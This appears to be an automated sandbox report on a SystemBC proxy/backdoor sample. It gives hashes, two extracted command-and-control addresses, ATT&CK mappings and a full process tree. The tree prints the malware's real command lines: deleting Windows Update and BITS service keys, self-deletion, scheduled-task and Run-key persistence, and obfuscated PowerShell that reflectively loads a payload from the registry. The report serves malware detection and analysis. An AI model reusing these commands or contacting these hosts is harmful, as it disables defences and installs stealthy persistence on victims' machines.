systembc | 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a

Analysis

max time kernel
256s
max time network
248s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 04:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
Size

1.1MB
MD5

01f89dd05027734cdf71f9923179a57a
SHA1

f6cbdf1f40fcc5349ff58245cb7d14d5a5113ac0
SHA256

2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a
SHA512

36328e775c5cb77663e8daec6f2d72356146e17201c0340624007f78de4c0ebb20cb4a282dc324893d8088463403a26a6fd2447f4c949d7fe0de00650d2c9bf1
SSDEEP

24576:+4j4a/KxTMoQvaBtu+vOQst38HZjbxiOJx7nTlbPujvb+nayzg8vk862s3vX/1rw:+WCGjL+2P8H5b0GnTlLYYDzgI961vXVk

Score

10^/10

systembc evasion trojan

Malware Config

Extracted

Family

systembc

89.22.225.242:4193

195.2.93.22:4193

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

hqdsgvj.exe

description	pid	process	target process
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE
PID 1524 created 1360	1524	hqdsgvj.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

pirihoq pereq kiyiw.exehqdsgvj.exe

pid process

1224 pirihoq pereq kiyiw.exe
1524 hqdsgvj.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1536 cmd.exe
Loads dropped DLL 2 IoCs

Processes:

2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exetaskeng.exe

pid process

1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1632 taskeng.exe

pid	process
1224	pirihoq pereq kiyiw.exe
1524	hqdsgvj.exe

pid	process
1536	cmd.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exehqdsgvj.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe	hqdsgvj.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

hqdsgvj.exe

pid process

1524 hqdsgvj.exe
1524 hqdsgvj.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

hqdsgvj.exe

description pid process target process

PID 1524 set thread context of 276 1524 hqdsgvj.exe dialer.exe
Drops file in Windows directory 1 IoCs

Processes:

pirihoq pereq kiyiw.exe

description ioc process

File created C:\Windows\Tasks\lgsvqjctharkdupidun.job pirihoq pereq kiyiw.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

948 sc.exe
896 sc.exe
992 sc.exe
1664 sc.exe
568 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

632 schtasks.exe
1960 schtasks.exe

pid	process
1524	hqdsgvj.exe
1524	hqdsgvj.exe

description	pid	process	target process
PID 1524 set thread context of 276	1524	hqdsgvj.exe	dialer.exe

description	ioc	process
File created	C:\Windows\Tasks\lgsvqjctharkdupidun.job	pirihoq pereq kiyiw.exe

pid	process
948	sc.exe
896	sc.exe
992	sc.exe
1664	sc.exe
568	sc.exe

pid	process
632	schtasks.exe
1960	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801ee9671502d901	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1584 PING.EXE

pid	process
1584	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exepirihoq pereq kiyiw.exehqdsgvj.exepowershell.exe

pid	process
1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
1224	pirihoq pereq kiyiw.exe
1224	pirihoq pereq kiyiw.exe
1224	pirihoq pereq kiyiw.exe
1224	pirihoq pereq kiyiw.exe
1224	pirihoq pereq kiyiw.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1404	powershell.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe
1524	hqdsgvj.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1996	powercfg.exe
Token: SeShutdownPrivilege	1836	powercfg.exe
Token: SeShutdownPrivilege	1004	powercfg.exe
Token: SeShutdownPrivilege	840	powercfg.exe
Token: SeDebugPrivilege	1404	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.execmd.exetaskeng.execmd.execmd.exe

description	pid	process	target process
PID 1464 wrote to memory of 632	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	schtasks.exe
PID 1464 wrote to memory of 632	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	schtasks.exe
PID 1464 wrote to memory of 632	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	schtasks.exe
PID 1464 wrote to memory of 632	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	schtasks.exe
PID 1464 wrote to memory of 1224	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	pirihoq pereq kiyiw.exe
PID 1464 wrote to memory of 1224	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	pirihoq pereq kiyiw.exe
PID 1464 wrote to memory of 1224	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	pirihoq pereq kiyiw.exe
PID 1464 wrote to memory of 1224	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	pirihoq pereq kiyiw.exe
PID 1464 wrote to memory of 1536	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	cmd.exe
PID 1464 wrote to memory of 1536	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	cmd.exe
PID 1464 wrote to memory of 1536	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	cmd.exe
PID 1464 wrote to memory of 1536	1464	2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe	cmd.exe
PID 1536 wrote to memory of 240	1536	cmd.exe	chcp.com
PID 1536 wrote to memory of 240	1536	cmd.exe	chcp.com
PID 1536 wrote to memory of 240	1536	cmd.exe	chcp.com
PID 1536 wrote to memory of 240	1536	cmd.exe	chcp.com
PID 1536 wrote to memory of 1584	1536	cmd.exe	PING.EXE
PID 1536 wrote to memory of 1584	1536	cmd.exe	PING.EXE
PID 1536 wrote to memory of 1584	1536	cmd.exe	PING.EXE
PID 1536 wrote to memory of 1584	1536	cmd.exe	PING.EXE
PID 1632 wrote to memory of 1524	1632	taskeng.exe	hqdsgvj.exe
PID 1632 wrote to memory of 1524	1632	taskeng.exe	hqdsgvj.exe
PID 1632 wrote to memory of 1524	1632	taskeng.exe	hqdsgvj.exe
PID 1760 wrote to memory of 1996	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1996	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1996	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 568	668	cmd.exe	sc.exe
PID 668 wrote to memory of 568	668	cmd.exe	sc.exe
PID 668 wrote to memory of 568	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1664	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1664	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1664	668	cmd.exe	sc.exe
PID 1760 wrote to memory of 1836	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1836	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1836	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 992	668	cmd.exe	sc.exe
PID 668 wrote to memory of 992	668	cmd.exe	sc.exe
PID 668 wrote to memory of 992	668	cmd.exe	sc.exe
PID 668 wrote to memory of 948	668	cmd.exe	sc.exe
PID 668 wrote to memory of 948	668	cmd.exe	sc.exe
PID 668 wrote to memory of 948	668	cmd.exe	sc.exe
PID 1760 wrote to memory of 1004	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1004	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1004	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 896	668	cmd.exe	sc.exe
PID 668 wrote to memory of 896	668	cmd.exe	sc.exe
PID 668 wrote to memory of 896	668	cmd.exe	sc.exe
PID 668 wrote to memory of 952	668	cmd.exe	reg.exe
PID 668 wrote to memory of 952	668	cmd.exe	reg.exe
PID 668 wrote to memory of 952	668	cmd.exe	reg.exe
PID 1760 wrote to memory of 840	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 840	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 840	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 1636	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1636	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1636	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1620	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1620	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1620	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1536	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1536	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1536	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1168	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1168	668	cmd.exe	reg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1360

C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
"C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"
3⤵
- Creates scheduled task(s)
PID:632

C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe
"C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"
3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:240

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:1584

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:948

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:896

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:952

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1664

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:568

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1636

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1620

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1536

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1168

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vngabyebz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi' /tr '''C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi" /t REG_SZ /f /d 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn nvdrivesllapi /tr 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe'
3⤵
- Creates scheduled task(s)
PID:1960

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe"
2⤵
PID:808

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qisygekiu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvdrivesllapi" } Else { "C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe" }
2⤵
PID:2004

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn nvdrivesllapi
3⤵
PID:188

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:276

C:\Windows\system32\taskeng.exe
taskeng.exe {5EEDE104-05EC-4674-BAB9-269A903F6C53} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632

C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe
C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+''+'s'+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
2⤵
PID:548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'er'+'s'+''+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
2⤵
PID:1280

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{083f3b28-d8d6-4a87-b29c-dd355c3f17d3}
1⤵
PID:1264

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe

Filesize
10.0MB

MD5
ce4164c119c97408d2e97898666ce565

SHA1
a1c5d881fa81e69bd56d078e1801d361231d3e9a

SHA256
f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2

SHA512
683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe

Filesize
10.0MB

MD5
ce4164c119c97408d2e97898666ce565

SHA1
a1c5d881fa81e69bd56d078e1801d361231d3e9a

SHA256
f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2

SHA512
683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5

Download Submit
C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe

Filesize
526.9MB

MD5
5d7bb427a0945fba6de9626394daebec

SHA1
84fe21bebd8539cba7d7d6462112938847380bb8

SHA256
00083b1705a5dbcc982e193fcf547011b699265a30ce3dae14d2cc39530f4922

SHA512
e8fa9f03b0ca854e016cddace0f81d2de5e3d34bc971a2221486869f0805c2cc4d6b3345444c2d374036f3fe783605421d0a29b0518796354e2607158343962b

Download Submit
\Users\Admin\AppData\Local\Temp\hqdsgvj.exe

Filesize
10.0MB

MD5
ce4164c119c97408d2e97898666ce565

SHA1
a1c5d881fa81e69bd56d078e1801d361231d3e9a

SHA256
f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2

SHA512
683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5

Download Submit
\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe

Filesize
531.6MB

MD5
f644a969d4ba3dbf20cb479b558ee856

SHA1
eaefb036ca37ebcb8f07098ab262295d84a77337

SHA256
fda569deb873a581920a2fccd772952af2dd8d4c5a3a81c078bb564bf302df7e

SHA512
f3a550c2075a0260812eb483b05d8d68328fa15b395fefe105901dc5585a52181453e982b8c28fb9e0a5f5de4587f615e54f1c361d17e4f2ac630a75c6d3a869

Download Submit
memory/188-116-0x0000000000000000-mapping.dmp

Download
memory/240-67-0x0000000000000000-mapping.dmp

Download
memory/276-109-0x0000000140001938-mapping.dmp

Download
memory/340-235-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/340-234-0x0000000000920000-0x0000000000947000-memory.dmp

Filesize
156KB

Download
memory/420-153-0x0000000000880000-0x00000000008A7000-memory.dmp

Filesize
156KB

Download
memory/420-145-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/420-143-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/420-140-0x00000000007C0000-0x00000000007E1000-memory.dmp

Filesize
132KB

Download
memory/420-151-0x00000000007C0000-0x00000000007E1000-memory.dmp

Filesize
132KB

Download
memory/456-238-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/456-237-0x0000000001C60000-0x0000000001C87000-memory.dmp

Filesize
156KB

Download
memory/464-158-0x00000000000E0000-0x0000000000107000-memory.dmp

Filesize
156KB

Download
memory/464-150-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/464-148-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/480-155-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/480-157-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/480-160-0x00000000000C0000-0x00000000000E7000-memory.dmp

Filesize
156KB

Download
memory/488-161-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/488-166-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/488-163-0x0000000000510000-0x0000000000537000-memory.dmp

Filesize
156KB

Download
memory/548-117-0x0000000000000000-mapping.dmp

Download
memory/568-90-0x0000000000000000-mapping.dmp

Download
memory/596-167-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/596-168-0x0000000000420000-0x0000000000447000-memory.dmp

Filesize
156KB

Download
memory/596-171-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/632-61-0x0000000000000000-mapping.dmp

Download
memory/676-228-0x0000000000510000-0x0000000000537000-memory.dmp

Filesize
156KB

Download
memory/748-177-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/748-229-0x0000000000840000-0x0000000000867000-memory.dmp

Filesize
156KB

Download
memory/748-178-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/816-231-0x00000000009E0000-0x0000000000A07000-memory.dmp

Filesize
156KB

Download
memory/816-185-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/816-186-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/840-100-0x0000000000000000-mapping.dmp

Download
memory/852-232-0x0000000000890000-0x00000000008B7000-memory.dmp

Filesize
156KB

Download
memory/852-233-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/876-230-0x0000000000840000-0x0000000000867000-memory.dmp

Filesize
156KB

Download
memory/896-98-0x0000000000000000-mapping.dmp

Download
memory/916-247-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/916-246-0x0000000001F10000-0x0000000001F37000-memory.dmp

Filesize
156KB

Download
memory/948-95-0x0000000000000000-mapping.dmp

Download
memory/952-99-0x0000000000000000-mapping.dmp

Download
memory/992-94-0x0000000000000000-mapping.dmp

Download
memory/1004-97-0x0000000000000000-mapping.dmp

Download
memory/1044-236-0x00000000001C0000-0x00000000001E7000-memory.dmp

Filesize
156KB

Download
memory/1100-243-0x00000000007A0000-0x00000000007C7000-memory.dmp

Filesize
156KB

Download
memory/1124-244-0x00000000009E0000-0x0000000000A07000-memory.dmp

Filesize
156KB

Download
memory/1168-104-0x0000000000000000-mapping.dmp

Download
memory/1224-81-0x0000000001ED0000-0x0000000001F48000-memory.dmp

Filesize
480KB

Download
memory/1224-77-0x0000000001ED0000-0x0000000001F48000-memory.dmp

Filesize
480KB

Download
memory/1224-73-0x0000000002010000-0x000000000210B000-memory.dmp

Filesize
1004KB

Download
memory/1224-70-0x0000000002210000-0x000000000270C000-memory.dmp

Filesize
5.0MB

Download
memory/1224-75-0x0000000002010000-0x000000000210B000-memory.dmp

Filesize
1004KB

Download
memory/1224-63-0x0000000000000000-mapping.dmp

Download
memory/1224-78-0x0000000000470000-0x0000000000477000-memory.dmp

Filesize
28KB

Download
memory/1224-76-0x0000000076F70000-0x00000000770F0000-memory.dmp

Filesize
1.5MB

Download
memory/1224-74-0x0000000002210000-0x000000000270C000-memory.dmp

Filesize
5.0MB

Download
memory/1228-239-0x0000000001EA0000-0x0000000001EC7000-memory.dmp

Filesize
156KB

Download
memory/1264-146-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1264-149-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1264-134-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1264-130-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1264-131-0x0000000140002314-mapping.dmp

Download
memory/1264-138-0x0000000076B70000-0x0000000076C8F000-memory.dmp

Filesize
1.1MB

Download
memory/1264-136-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1280-118-0x0000000000000000-mapping.dmp

Download
memory/1280-125-0x000000000117B000-0x000000000119A000-memory.dmp

Filesize
124KB

Download
